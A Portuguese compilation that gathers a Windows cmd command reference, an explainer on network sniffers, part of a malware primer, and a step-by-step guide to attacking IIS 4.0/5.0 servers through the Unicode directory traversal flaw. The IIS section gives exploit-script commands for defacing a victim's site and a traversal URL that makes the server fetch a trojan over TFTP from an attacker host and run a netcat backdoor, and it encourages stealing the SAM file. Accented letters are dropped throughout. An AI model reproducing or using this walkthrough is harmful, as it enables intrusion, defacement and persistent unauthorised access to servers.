Você está na página 1de 27

Prompt de Comando (cmd.

exe)
Aki vai pr vcs os tods os codicos basicos do cmd.
Bootcfg Permite ver as configuraes do seu menu de boot
Defrag Desfragmentador de disco. Oferece as seguintes opes:
-a Apenas analisar
-f Forar a desfragmentao mesmo que haja pouco espao livre.
-v Sada detalhada
-? Exibir tpico de ajuda.
Diskpart Gerencia as parties de um disco.
Driverquery Mostra a lista de drivers instalados no Windows e as respectivas propriedades.
Fsutil O comando fsutil tem vrios complementos que sero listados digitando-o sem
nenhum parmetro. Digite fsutil fsingo drives e ter a lista dos drives no seu micro.
Gepresult Este comando mostrar configuraes de usurios e de diretivas de grupos.
Recover Permite a recuperao de arquvios em disco danificado.
Reg Comando para exportar chaves do registro, copiar, restaurar, comparar, etc.
Schtasks Para agendar, executar, alterar ou deletar tarefas numa mquina local ou remota
com Windows.
SFC Comando que permite verificar arquivos de sistemas alterados de forma indevida e
recuperar os arquivos originais e oficiais da Microsoft., o que nem sempre ser
recomendvel. Por exemplo, o arquivo uxtheme.dll modificado para permitir o uso de temas
voltaria a ser substitudo pelo original.
Shutdown O comando shutdown permite desligar ou reiniciar o computador de forma
imediata ou agendada.
Systeminfo Fornece informaes bsicas sobre o sistema.
Tasklist Mostra a lista de processos sendo executados no Windows.
Taskkill Permite finalizar algum processo. O comando quase sempre usado com base
nas informaes fornecidas pelo tasklist. Por exemplo, para finalizar o Messenger digite
"taskkill /PID 1680". A identificao do PID de cada processo sendo executado voc ficar
sabendo com o comando tasklist.
ASSOC Exibe ou modifica associaes de extenses de arquivo.
AT Agenda comandos e programas para serem executados em um computador.
ATTRIB Exibe ou altera atributos de arquivos.
BOOTCFG Mostra o boot.ini no prompt de comando
BREAK Define ou limpa a verificao estendida CTRL+C.
CACLS Exibe ou modifica listas de controle de acesso (ACLs) de arquivos.
CALL Chama um programa em lotes a partir de outro.
CHCP Exibe ou define o nmero da pgina de cdigo ativa.
CHKDSK Verifica um disco e exibe um relatrio de status.

CHKNTFS Exibe ou modifica a verificao do disco na inicializao.


CLS Limpa a tela
CMD Abre uma outra janela de prompt.
COLOR Define as cores padro de primeiro plano e do plano de fundo do console
COMP Compara o contedo de dois arquivos ou grupos de arquivos.
COMPACT Exibe ou altera a compactao de arquivos.
CONVERT Converte volumes FAT em NTFS.
COPY Copia um ou mais arquivos para outro local.
DATE Mostra a data atual e permite alter-la.
DISKCOMP Compara o contedo de dois disquetes.
DISKCOPY Copia o contedo de um disquete para outro.
DISKPART Faz particionamento de disco
DOSKEY Edita linhas de comando, volta a chamar comandos do Windows e cria macros.
ECHO Exibe mensagens ou ativa ou desativa o echo de comandos.
ENDLOCAL Encerra a localizao de alteraes de ambiente em um arquivo em lotes.
EXIT Sai do programa CMD.EXE (interpretador de comandos).
FC Compara dois arquivos ou grupos de arquivos e exibe as diferenas entre eles.
FIND Procura uma seqncia de texto em um arquivo ou arquivos.
FINDSTR Procura seqncias de texto em arquivos.
FOR Executa um determinado comando para cada arquivo em um grupo de arquivos.
FORMAT Formata um disco rgido ou disquete.
FTYPE Exibe ou modifica os tipos de arquivo utilizados em associaes de extenses de
arquivos.
GOTO Direciona o interpretador de comandos do Windows para uma linha identificada em
um programa em lotes.
GRAFTABL Permite que o Windows exiba um conjunto de caracteres estendidos em modo
grfico.
HELP Fornece informaes de ajuda sobre comandos do Windows.
HOSTNAME D o nome do host
IF Realiza processamento condicional em arquivos em lotes.
IPCONFIG Mostra detalhes das configuraes de IP
LABEL Cria, altera ou exclui o rtulo de volume de um disco.
MODE Configura um dispositivo do sistema.
MORE Exibe a sada fazendo pausa a cada tela.
MOVE Move um ou mais arquivos de uma pasta para outra pasta.
PAGEFILECONFIG Configura memria virtual

PATH Exibe ou define um caminho de pesquisa para arquivos executveis.


PAUSE Suspende o processamento de um arquivo em lotes e exibe uma mensagem.
PING Checa sua conexo de rede disponvel
POPD Restaura o valor anterior da pasta atual salva por PUSHD.
PRINT Imprime um arquivo de texto.
PROMPT Altera o prompt de comando do Windows.
PUSHD Salva a pasta atual e, em seguida, altera a mesma.
REM Grava comentrios (observaes) em arquivos em lotes.
REPLACE Substitui arquivos.
ROUT Mostra detalhes do parmetro da interface de rede
SCHTASKS Agenda e executa algum processo
SET Exibe, define ou remove variveis de ambiente do Windows.
SETLOCAL Inicia a localizao de alteraes de ambiente em um arquivo em lotes.
SHIFT Altera a posio dos parmetros substituveis em um arquivo em lotes.
SORT Classifica a entrada.
START Inicia uma janela separada para executar um programa ou comando especificado.
SUBST Associa um caminho a uma letra de unidade.
TITLE Define o ttulo da janela para uma sesso do CMD.EXE.
TREE Exibe graficamente a estrutura de pastas de uma unidade ou caminho.
TYPE Exibe o contedo de um arquivo de texto.
VER Mostra a verso do Windows.
VERIFY Faz com que o Windows verifique se os arquivos esto gravados corretamente em
um disco.
VOL Exibe um rtulo e nmero de srie de volume de disco.
XCOPY Copia diretrios com seus subdiretrios.
APPEND Acrescebtar um Arquivo
ASCII DEFINIR UM TIPO DE TRANFERNCIA ASCII
BELL EMITIR UM AVISO SONORO AO TRMINO DO COMANDO
BINARY DEFINIR TIPO DE TRANSFERNCIA BINRIA
BYE TERMINAR SEO DE FTP E SAIR
CD ALTERAR A PASTA DE TRABALHO REMOTA
CLOSE TERMINAR SESSO DE FTP
DELETE EXCLUIR PASTAS DE TRABALHO REMOTA
DEBUG LIGAR/DESLIGAR MODO DE DEPURAO
DIR LISTAR CONTEDO DA PASTA REMOTA
DISCONNECT TERMINAR SESSO DE FTP

GET RECEBER ARQUIVO


GLOB LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS
HASH LIGAR/DESLIGAR IMPRESSO "#" PARA CADA BUFFER TRANSFERIDO
HELP AJUDA DO FTP
LCD ALTERAR A PASTA DE TRABALHO LOCAL
LITERAL ENVIAR UM COMANDO DE FTP ARBITRIO
LS LISTAR O CONTEDO DA PASTA REMOTA
MDELETE EXCLUI VRIOS ARQUIVOS
MDIR LISTAR O CONTEDO DE VRIAS PASTAS REMOTAS
M GET OBTER VRIOS ARQUIVOS
MKDIR CRIA UMA PASTA NA MQUINA NA MQUINA REMOTA
MLS LISTAR O CONTEDO DE VRIAS PASTAS REMOTAS
MPUT ENVIAR VRIOS ARQUIVOS
OPEN CONECTAR AO FTP REMOTO
PROMPT FORAR PROMPT INTERATIVO EM MLTIPLOS COMANDOS
PUT ENVIAR UM ARQUIVO
PWD IMPRIMIR A PASTA DE TRABALHO NA MQUINA REMOTA
QUIT TERMINAR A SESSO DE FTP E SAIR
QUOT ENVIAR UM COMANDO ARBITRRIO
RECV RECEBER ARQUIVO
REMOTEHELP OBTER AJUDA A PARTIR DO SERVIDOR REMOTO
RENAME RENOMEAR ARQUIVO
RMDIR REMOVER PASTA DA MQUINA REMOTA
SEND ENVIAR ARQUIVO
STATUS MOSTRAR STATUS ATUAL
TRACE LIGAR/DESLIGAR RASTREAMENTO DE PACOTES
TYPE DEFINIR O TIPO DE TRANSFERNCIA DE ARQUIVOS
USER ENVIAR INFORMAES DE NOVO USURIO
Os comandos abaixo listam comandos adicionais do Windows XP Pro:
eventcreate - Permite ao administrador criar uma mensagem e identificao do evento
personalizadas em um log de eventos especificado.
eventquery - Lista os eventos ou as propriedades de um evento de um ou mais arquivo log.
eventtriggers - Mostra e configura disparadores de evento.
getmac - Mostra o endereo MAC de um ou mais adaptador de rede.
helpctr - Inicia o Centro de Ajuda e Suporte.
ipseccmd - Configura o Internet Protocol Security (IPSec)

logman - Gerencia o servio Logs e alertas de desempenho.


openfiles - Busca, mostra ou termina arquivos abertos compartilhados.
pagefileconfig - Mostra e configura a memria virtual.
perfmon - Abre o monitor do sistema.
prncnfg - Configure ou mostra as configuraes de impressora.
prndrvr - Adiciona, deleta e lista drivers de impressoras.
prnjobs - Pausa, continua ou cancela lista de documentos a serem impressos.
prnmngr - Adiciona, deleta e lista impressoras conectadas, alm da impressora default.
prnport - Cria, deleta e lista portas de impressora TCP/IP
prnqctl - Imprime uma pgina de teste, pausa ou reinicia um documento a ser impresso.
schtasks - Permite que um administrador crie, exclua, consulte, altere, execute e termine
tarefas agendadas em um sistema local ou remoto.
systeminfo - Busca no sistema informao sobre configuraes bsicas.
typeperf - grava dados de desempenho na janela de comando ou em um arquivo de log.
Para interromper Typeperf, pressione CTRL+C.
Outros comandos, mas no do CMD, Tecla Windows esquerda do teclado, aqui no meu
a bandeirinha do Tio Bill(Microsoft).
Todo teclado atual traz uma tecla Windows que pode ser usada em conjunto com alguma
outra tecla para servir de atalho para alguma atividade. Veja abaixo a relao de atalhos
da tecla Windows e tire mais proveito dela:
Windows: Mostra o Menu Iniciar
Windows + D: Minimiza ou restaura todas as janelas
Windows + E: Abre Meu computador
Windows + F: Abre o Pesquisar para arquivos
Windows + R: Mostra a janela Executar
Windows + L: Tranca a tela
Windows + U: Abre o Gerenciador de Utilitrios
Windows + CTRL + F: Mostra o Pesquisar para computador (em rede)
Windows + Shift + M: Desfaz minimizar (para todas as janelas)
Windows + F1: Para Ajuda e Suporte
Windows + BREAK: Mostra as Propriedades de Sistema
- Comandos relacionados aos Servios do Windows que podem ser digitados no menu
Iniciar / Executar:
compmgmt.msc - gerenciar o computador
devmgmt.msc - gerenciamento de dispositivos
diskmgmt.msc - gerenciamento de discos
dfrg.msc - desfragmentador

eventvwr.msc - visualizar eventos


fsmgmt.msc - pastas compartilhadas
gpedit.msc - diretivas de grupo
lusrmgr.msc - usurios e grupos locais
perfmon.msc - monitor de performance
rsop.msc - conjunto de diretivas resultante
secpol.msc - configuraes de segurana
services.msc - servios gerais
control userpasswords2 - contas de usurio
regedit - registro do windows
eudceit - paint
fsquirt - bluetooh
drwatson - verificar erros
drwtsn32 - lista de erros
logoff - fazer logoff - finalizar a sesso
magnify - lente de aumento
msconfig - ultilitrio de configurao do sistema
mstsc - conectar ao outro computador - invadir
osunist - desistalar o windows
rtcshare - compartilhar arquivos com outro computador
syskey - proteger os dados
virifier - virificar driver
pagefileconfig gpedit - diretiva do computador
mmc - abrir outros comandos
nslookup - talvez seja o ip do computador
Dica de Comandos DOS postado pelo colega thiagobodruk
Comandos
title nome define um nome no ttulo da pgina.
Echo Exibe uma string na tela.
Ex.: echo teste (escreve teste na tela)
echo. cria uma linha em branco.
@echo off - Desativa a exibio dos comandos na tela. Deve ser adicionado primeira
linha de um arquivo de lote MS-DOS (*.BAT).
Cls Limpa a tela.
set string = valor; - define uma varivel.

Ex.: set a = 10; (define varivel a com valor igual a 10)


%string% - chama varivel.
Ex.: set a = teste;
echo %a% (primeiro define a com valor igual a teste, segunda linha escreve na tela o
conteda da varivel a, no caso a palavra teste)
pause - pausa as execues, para prosseguir necessrio pressionar alguma tecla.
md nome - cria um diretrio chamado nome.
rd nome - remove o diretrio vazio nome.
cd nome - direciona prompt para o diretrio nome.
copy diretrio origem diretriodestino - copia um arquivo ou pasta de um diretrio origem
para um diretrio destino.
Ex.: copy C:\windows\rundll32.exe C:\Pasta
del nome deleta arquivo nome.
deltree diretrio deleta diretrio no-vazio e todo seu contedo. Este comando pede
confirmao (Y/N), para confirmar direto, usa-se deltree/y.
renam nomeantigo.extenso nomenovo.extenso - renomeia arquivos ou pastas.
Ex.: renam C:\windows\mistic.exe C:\windows\barret.exe
dir define contedo do diretrio.
:nome cria um pargrafo de orientao chamado nome.
goto nome direciona a "leitura" para o pargrafo nome.
call arquivo chama um arquivo de lote do MS-DOS.
start arquivo inicia uma aplicao do Windows.
date exibe/altera data.
time exibe/altera hora.
exit fecha o prompt do MS-DOS.
Observaes
- Para saber informaes sobre determinado comando, sua sintaxe, etc, basta digitar
comando/?. Ira aparecer na tela uma "ajuda" sobre o comando.
- super importante voc saber no que est mexendo, algumas alteraes podem
comprometer seu computador.
- Existem alguns comandos de programas como o shutdowm, por exemplo, mas so
muitos, mais fcil voc consultar a ajuda deles /?.
Como criar um arquivo de lote? (*.BAT)
Abra o bloco de notas do WinXP, digite os comandos em linhas de acordo com a sua
inteno. Salve Como nomedesejado.BAT. importante esta notao, pois o que vai
definir o arquivo como sendo um arquivo de lote.
Editado

Comandos do MS-DOS
Este tutorial tem por objetivo mostrar os comandos do DOS. Muitas pessoas pensam que
so inteis mas caso ocorra alguma emergncia no PC voc ir precisar destes comandos
...
1. Diferenas entre comandos internos e externos
2. Os comandos internos
Editado
P/facilitar se algum quiser arquivar ou imprimir

Sniffers so programas que tem como princpio capturar pacotes de rede. Ele analisa o
trafego de rede e identifica reas vulnerveis. Suponha que sua rede esteja enfrentando
lentides, quedas ou corrupes de dados. Isso pode ser um sinal de invaso!
Os Sniffers variam em sua funcionalidade e projeto. Alguns analisam somente um
protocolo, enquanto outros podem analisar centenas. Como uma regra geral, os sniffers
mais modernos analisaro pelo menos os protocolos:
Ethernet padro
TCP/IP
IPX
DECNet
Os sniffers capturam pacotes de rede colocando a interface de rede Ethernet por exemplo,
em modo passivo. Em redes locais os dados trafegam de uma mquina a outra por meio
do cabo em pequenas unidades chamadas frames. Esses frames so divididos em sees
que carregam informaes especficas. Os sniffers impem um risco de segurana pela
forma como os frames so transportados e entregues.
Cada estao de trabalho em uma rede local tem seu prprio endereo de hardware. Esse
endereo identifica de maneira exclusiva essa mquina em relao a todas as outras na
rede. Quando voc envia uma mensagem atravs da rede local, seus pacotes so
enviados para todas as mquinas conectadas (broadcast). Isso quer dizer que todas as
mquinas na rede podero ouvir esse trfego, mas somente respondero aos dados
endereados especificamente a elas.
Se uma interface de rede da estao de trabalho operar em modo passivo, ela pode
capturar todos os pacotes e frames na rede. Uma estao de trabalho configurada dessa
forma (juntamente com o software) um sniffer.
Os Sniffers representam um alto nvel de risco, porque:
Os sniffers podem capturar senhas de e-mail, carto de crdito e outras contas
Os sniffers podem capturar logins, e-mails, mensagens confidenciais etc.
Os sniffers podem ser utilizados para abrir brechas na segurana de redes prximas ou
adquirir acesso de alto nvel.
De fato, a existncia de um sniffer no autorizado em sua rede pode indicar que seu
sistema j est comprometido. Os sniffers capturaro todos os pacotes na rede mas, na

prtica, muito relativo. Um ataque sniffer no to fcil quanto parece, ele requer
conhecimento em redes. Simplesmente configurar um sniffer e deix-lo trabalhando no
funcionar por muito tempo, porque mesmo uma rede de apenas cinco estaes transmite
milhares de pacotes por hora. Em pouco tempo o arquivo de log de um sniffer pode
facilmente encher um disco rgido (se estiver capturando todos os pacotes).
Para superar esse problema, os crackers geralmente armazenam somente os primeiros
200~300 bytes de cada pacote. O nome de usurio e senha esto contidos nessa parte,
tudo o que eles realmente querem.
criptografiaA tecnologia de segurana, em relao a este problema, desenvolveu-se
consideravelmente. Alguns sistemas operacionais j empregam criptografia no nvel de
pacote e, mesmo se um ataque sniffer conseguir obter dados valiosos, esses dados
estaro praticamente ilegveis. Isso representa um obstculo adicional a ser ultrapassado
somente por aqueles com um conhecimento mais profundo de segurana, criptografia e
rede.
Os sniffers so extremamente difceis de serem detectados porque so programas
passivos. Eles no armazenam dados especficos no registro do sistema operacional ou
disco rgido, a menos que seu usurio seja muito desinformado (e capture todos os
pacotes por completo), eles consomem poucos recursos de rede. possvel localizar um
sniffer em uma mquina usando o MD5, desde que tenha um banco de dados decente dos
arquivos originais da instalao. Voc precisar baixar o script md5check que automatiza o
processo.
Certamente, pesquisar por um sniffer em uma nica mquina fcil. Entretanto, localizar
um sniffer em uma rede grande difcil. Na internet existem ferramentas que podero lhe
ajudar.
Suponha que algum entre em um escritrio vazio, desconecte uma mquina da rede e
conecte um laptop com o mesmo IP. Existe tambm sniffers assim. Este ainda mais difcil
de se detectar, a menos que voc esteja utilizando mapas de rede e esteja em constante
verificao do mesmo.
Se voc desconfia que algum grampeou sua rede, procure por ferramentas que lhe
auxiliaro. Uma ferramenta que voc pode testar chama-se TDR (Time Domain
Reflectometer). Os TDRs medem a propagao ou flutuao de ondas eletromagnticas.
Um TDR anexado sua rede local revelar pontes no autorizadas sugando os dados.
Solues preventivas so difceis e praticamente inviveis. Em vez disso, adote uma
abordagem mais defensiva. H duas defesas muito importantes contra sniffers:
Topologia segmentada
Sesses criptografadas
Os sniffers somente podem capturar os dados no mesmo segmento de rede. Isso significa
que quanto mais voc segmenta sua rede, menos informaes um sniffer pode coletar. H
trs interfaces de rede que um sniffer no pode vencer:
Switches
Roteadores
Bridges
Sesses criptografadas fornecem uma soluo diferente. Em vez de preocupar-se com

dados sendo capturados, voc simplesmente os criptografa, ou seja, retira sua legividade.
O SSH (Secure Shell) um exemplo de programa que fornece comunicao criptografada,
substituindo o antigo Telnet.

Dicas para invadir servidores


Todas as dicas contidas nesta
rea so totalmente de sua responsabilidade, esto aqui apenas com o intuito de
trazer as informaes para que vocs internautas tenham um conhecimento alm do
normal e saiba como se defender na internet, portanto eu no me responsabilizo
por qualquer ato imbecil que voc venha a fazer com as informaes aqui
contidas.
Tentaremos aqui desenvolver um paper explicando
passo--passo de como um "hacker" faz para obter acesso num servidor rodando
WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal
vulnervel e como corrigir essa vulnerabilidade.
Obs: esta
tcnica j bem
velhinha
Segue abaixo as verses dos
Sistemas Operacionais e Programas Vulnerveis.
::Vulnervel:
::Microsoft IIS 5.0
+Microsoft Windows NT 2000
::Microsoft IIS 4.0
- Microsoft Windows NT 4.0
+Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
Vamos ao que interessa
INDICE
1 Procurar por um host vulnervel.
2 Testar se o host realmente vulnervel.
2.1 Fazer um scanner no host alvo.
2.2 Testar o exploit no host alvo antes mesmo de verificar se ele est
vulnervel ou no.

3 Listar os arquivos e pastas contidos no servidor vulnervel.


4 Alterar o contedo do site do host vulnervel.
5 TCNICAS DE HAXORS.
6 AGORA VOC UM HACKER. OU NO?
7 MAIS EXPLOITS.
8 CORREO.
1) Procurar por um host
vulnervel
Geralmente os hosts mais
procurados so os mais conhecidos, como sites do governo e empresas
nacionalmente e mundialmente conhecidas. Mas se voc quer dar uma de "hacker"
pegue uma hp bem fulerinha..
2) Testar se o host
realmente vulnervel.
Existem duas maneiras bsicas.
2.1 Fazer um scanner no host
alvo.
Existem scanners que vasculham
servidores e servios que esto sendo executados. Esses scanners verificam se h
algum servio vulnervel, que ainda no foi corrigido. Para testar essa
vulnerabilidade existem scanners tanto para windows quanto pra linux.
Para windows voc pode obter o
SSS - Security Shadow
Scanner (j vem com seu crack dentro do .zip)
Para linux um scanner feito perl que quando encontra um HOST vulnervel ele
inidica o url de onde pode-se obter o exploit para explorar essa
vulnerabilidade.
Segue abaixo como us-los:
- SSS (Security Shadow Scanner)
No h mistrio de como utiliz-lo. Basta preencher o campo com o IP ou HOST do
alvo e iniciar o "scanneamento". Quando encontrar ele colocar em vermelho um
aviso dizendo que o HOST est vulnervel ao msdac.dll.
- unicheck.pl - Veja o que
acontece quando ele acha um HOST vulnervel.
perl unicheck.pl XXX.XXX.XXX.XXX:80
- Pode ver que ele avisa que o host vulnervel. THIS HOST IS VULNERABLE .
Avisa onde encotrar o exploit para explorar a vulnerabilidade.
http://packetstorm.securify.com/0010-expl/unicodexecute2.pl
2.2 Testar o exploit no host alvo
antes mesmo de verificar se ele est vulnervel ou no..

Agora iremos testar o exploit no


nosso host alvo.
"dir c:inetpub"
Como pode ver acima, foi listado os diretrios dentro do diretrio c:inetpub.
Assim o "hacker" tem acesso todo o seus arquivos, podendo assim alterar o site
da empresa que infelizmente no tem uma equipe separada da equipe de
administrao responsvel pela segurana da empresa, que no s se limita
segurana virtual. Como o "hacker" pode ler o diretrio "c:inetpub" ele tambm
pode ter acesso ao diretrio padro do website "c:inetpubwwwroot" ou outro
diretrio que hospeda os arquivos do site da empresa como pode ver abaixo.
3) Listar os arquivos e pastas
contidos no servidor vulnervel.
Iremos listar todos os arquivos e
diretrios dentro de uma determinada pasta.>
perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot"
4) Alterar o contedo do site
do host vulnervel.
perl unicodexecute.pl www.host-alvo.com.br:80
''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''
Pronto... agora voc alterou o site da empresa que encontrou vulnervel. Quando
for acessar o site da empresa que encontrou vulnervel voc encontrar a
seguinte mensagem no site:
" SITE HACKED BY Remote Menace! "
assim que praticamente o mundo inteiro est sendo invadido.
5) TCNICAS DE HAXORS
Bom..
. agora varia de pessoa para pessoa, conheceimento para conhecimento,
criatividade para criatividade. O jeito de como voc pode obter maiores
informaes a partir da explorao da vulnerabilidade do unicode s depender de
voc.
Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso j garantido
ao servidor voc poder fazer o que bem entende. Geralmente os "hackers" do
Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as mquinas
que eles conseguem invadir. De certa forma isso muito bom, pois o que parece
que eles querem somente manifestar o seu descontentamento com o governo e a
administrao que o Brasil tem. No que isso seja certo ou que concordamos com o
que eles fazem. Infelizmente as pessoas ainda no tem conhecimento do que
acontece e o que realmente o underground e mesmo o que um HACKER no sentido
profundo.
Para voc obter um maior acesso
rede, ou seja, conseguir acesso outras mquinas, outros tipos de acessos,
abrir um terminal remoto e at mesmo continuar tendo acesso mquina, voc

precisa fazer algumas coisas, mesmo porque o servidor no ficar vulnervel para
sempre.
Voc pode utilizar ferramentas que j vem instaladas por default (padro) no
Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui
utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar
tendo acesso mquina mesmo depois de sua correo.
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"
+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe
.
agora rode o trojan com:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
Bom...
Agora voc instalou o nc no servidor, poder abrir um terminal remoto no Windows
NT, tendo acesso completo ao sistema.
Como foi dito antes, depende de voc continuar tendo acesso ao servidor. E essas
tcnicas esto sendo aprimoradas a cada dia. Voc acha que pode conseguir ter
acesso ao arquivo SAM? Voc pode descriptografar as senhas dos usurios? Voc
pode utilizar o terminal que voc abriu e tentar ter acesso outras mquinas
para no haver um reastreamento direto para sua mquina?Voc pode conseguir
acesso rede interna (10.0.0.0 por exemplo) se houver? Voc pode sniffar a rede
a partir dessa mquina e obter acesso s outras mquinas?
Como pode ver... pode se fazer MUITA coisa alm de modificar uma pgina apartir
de um bug que CENTENAS de servidores ainda continuam vulnerveis por todo o
mundo.
6) AGORA VOC UM HACKER. OU
NO?
Voc se considera um hacker?
Bom...
7) MAIS EXPLOITS.
Mais exploits:
iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux
unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl
8) CORREO.

Contratar um Security Officer


para cuidar da segurana da sua empresa.
Se manter o mais atualizado possvel.
Internet Informatio Server 4.0
http://www.microsoft.com/ntserver/nts/downloads/
Internet Informatio Server 5.0

Cdigos maliciosos (Malware)


Cdigos maliciosos (malware) so programas especificamente desenvolvidos para
executar aes danosas e atividades maliciosas em um computador. Algumas das
diversas formas como os cdigos maliciosos podem infectar ou comprometer um
computador so:
pela explorao de vulnerabilidades existentes nos programas instalados;
pela auto-execuo de mdias removveis infectadas, como pen-drives;
pelo acesso a pginas Web maliciosas, utilizando navegadores vulnerveis;
pela ao direta de atacantes que, aps invadirem o computador, incluem arquivos
contendo cdigos maliciosos;
pela execuo de arquivos previamente infectados, obtidos em anexos de mensagens
eletrnicas, via mdias removveis, em pginas Web ou diretamente de outros
computadores (atravs do compartilhamento de recursos).
Uma vez instalados, os cdigos maliciosos passam a ter acesso aos dados armazenados
no computador e podem executar aes em nome dos usurios, de acordo com as
permisses de cada usurio.
Os principais motivos que levam um atacante a desenvolver e a propagar cdigos
maliciosos so a obteno de vantagens financeiras, a coleta de informaes
confidenciais, o desejo de autopromoo e o vandalismo. Alm disto, os cdigos
maliciosos so muitas vezes usados como intermedirios e possibilitam a prtica de
golpes, a realizao de ataques e a disseminao de spam (mais detalhes nos Captulos
Golpes na Internet, Ataques na Internet e Spam, respectivamente).
Os principais tipos de cdigos maliciosos existentes so apresentados nas prximas
sees.
4.1. Vrus
Vrus um programa ou parte de um programa de computador, normalmente malicioso,
que se propaga inserindo cpias de si mesmo e se tornando parte de outros programas e
arquivos.
Para que possa se tornar ativo e dar continuidade ao processo de infeco, o vrus
depende da execuo do programa ou arquivo hospedeiro, ou seja, para que o seu
computador seja infectado preciso que um programa j infectado seja executado.
O principal meio de propagao de vrus costumava ser os disquetes. Com o tempo,
porm, estas mdias caram em desuso e comearam a surgir novas maneiras, como o

envio de e-mail. Atualmente, as mdias removveis tornaram-se novamente o principal meio


de propagao, no mais por disquetes, mas, principalmente, pelo uso de pen-drives.
H diferentes tipos de vrus. Alguns procuram permanecer ocultos, infectando arquivos do
disco e executando uma srie de atividades sem o conhecimento do usurio. H outros
que permanecem inativos durante certos perodos, entrando em atividade apenas em
datas especficas. Alguns dos tipos de vrus mais comuns so:
Vrus propagado por e-mail: recebido como um arquivo anexo a um e-mail cujo contedo
tenta induzir o usurio a clicar sobre este arquivo, fazendo com que seja executado.
Quando entra em ao, infecta arquivos e programas e envia cpias de si mesmo para os
e-mails encontrados nas listas de contatos gravadas no computador.
Vrus de script: escrito em linguagem de script, como VBScript e JavaScript, e recebido ao
acessar uma pgina Web ou por e-mail, como um arquivo anexo ou como parte do prprio
e-mail escrito em formato HTML. Pode ser automaticamente executado, dependendo da
configurao do navegador Web e do programa leitor de e-mails do usurio.
Vrus de macro: tipo especfico de vrus de script, escrito em linguagem de macro, que
tenta infectar arquivos manipulados por aplicativos que utilizam esta linguagem como, por
exemplo, os que compe o Microsoft Office (Excel, Word e PowerPoint, entre outros).
Vrus de telefone celular: vrus que se propaga de celular para celular por meio da
tecnologia bluetooth ou de mensagens MMS (Multimedia Message Service). A infeco
ocorre quando um usurio permite o recebimento de um arquivo infectado e o executa.
Aps infectar o celular, o vrus pode destruir ou sobrescrever arquivos, remover ou
transmitir contatos da agenda, efetuar ligaes telefnicas e drenar a carga da bateria,
alm de tentar se propagar para outros celulares.
4.2. Worm
Worm um programa capaz de se propagar automaticamente pelas redes, enviando
cpias de si mesmo de computador para computador.
Diferente do vrus, o worm no se propaga por meio da incluso de cpias de si mesmo
em outros programas ou arquivos, mas sim pela execuo direta de suas cpias ou pela
explorao automtica de vulnerabilidades existentes em programas instalados em
computadores.
Worms so notadamente responsveis por consumir muitos recursos, devido grande
quantidade de cpias de si mesmo que costumam propagar e, como consequncia, podem
afetar o desempenho de redes e a utilizao de computadores.
O processo de propagao e infeco dos worms ocorre da seguinte maneira:
Identificao dos computadores alvos: aps infectar um computador, o worm tenta se
propagar e continuar o processo de infeco. Para isto, necessita identificar os
computadores alvos para os quais tentar se copiar, o que pode ser feito de uma ou mais
das seguintes maneiras:
efetuar varredura na rede e identificar computadores ativos;
aguardar que outros computadores contatem o computador infectado;
utilizar listas, predefinidas ou obtidas na Internet, contendo a identificao dos alvos;
utilizar informaes contidas no computador infectado, como arquivos de configurao e
listas de endereos de e-mail.
Envio das cpias: aps identificar os alvos, o worm efetua cpias de si mesmo e tenta

envi-las para estes computadores, por uma ou mais das seguintes formas:
como parte da explorao de vulnerabilidades existentes em programas instalados no
computador alvo;
anexadas a e-mails;
via canais de IRC (Internet Relay Chat);
via programas de troca de mensagens instantneas;
includas em pastas compartilhadas em redes locais ou do tipo P2P (Peer to Peer).
Ativao das cpias: aps realizado o envio da cpia, o worm necessita ser executado
para que a infeco ocorra, o que pode acontecer de uma ou mais das seguintes
maneiras:
imediatamente aps ter sido transmitido, pela explorao de vulnerabilidades em
programas sendo executados no computador alvo no momento do recebimento da cpia;
diretamente pelo usurio, pela execuo de uma das cpias enviadas ao seu computador;
pela realizao de uma ao especfica do usurio, a qual o worm est condicionado
como, por exemplo, a insero de uma mdia removvel.
Reincio do processo: aps o alvo ser infectado, o processo de propagao e infeco
recomea, sendo que, a partir de agora, o computador que antes era o alvo passa a ser
tambm o computador originador dos ataques.
4.3. Bot e botnet
Bot um programa que dispe de mecanismos de comunicao com o invasor que
permitem que ele seja controlado remotamente. Possui processo de infeco e
propagao similar ao do worm, ou seja, capaz de se propagar automaticamente,
explorando vulnerabilidades existentes em programas instalados em computadores.
A comunicao entre o invasor e o computador infectado pelo bot pode ocorrer via canais
de IRC, servidores Web e redes do tipo P2P, entre outros meios. Ao se comunicar, o
invasor pode enviar instrues para que aes maliciosas sejam executadas, como
desferir ataques, furtar dados do computador infectado e enviar spam.
Um computador infectado por um bot costuma ser chamado de zumbi (zombie computer),
pois pode ser controlado remotamente, sem o conhecimento do seu dono. Tambm pode
ser chamado de spam zombie quando o bot instalado o transforma em um servidor de emails e o utiliza para o envio de spam.
Botnet uma rede formada por centenas ou milhares de computadores zumbis e que
permite potencializar as aes danosas executadas pelos bots.
Quanto mais zumbis participarem da botnet mais potente ela ser. O atacante que a
controlar, alm de us-la para seus prprios ataques, tambm pode alug-la para outras
pessoas ou grupos que desejem que uma ao maliciosa especfica seja executada.
Algumas das aes maliciosas que costumam ser executadas por intermdio de botnets
so: ataques de negao de servio, propagao de cdigos maliciosos (inclusive do
prprio bot), coleta de informaes de um grande nmero de computadores, envio de
spam e camuflagem da identidade do atacante (com o uso de proxies instalados nos
zumbis).
O esquema simplificado apresentado a seguir exemplifica o funcionamento bsico de uma
botnet:

Um atacante propaga um tipo especfico de bot na esperana de infectar e conseguir a


maior quantidade possvel de zumbis;
os zumbis ficam ento disposio do atacante, agora seu controlador, espera dos
comandos a serem executados;
quando o controlador deseja que uma ao seja realizada, ele envia aos zumbis os
comandos a serem executados, usando, por exemplo, redes do tipo P2P ou servidores
centralizados;
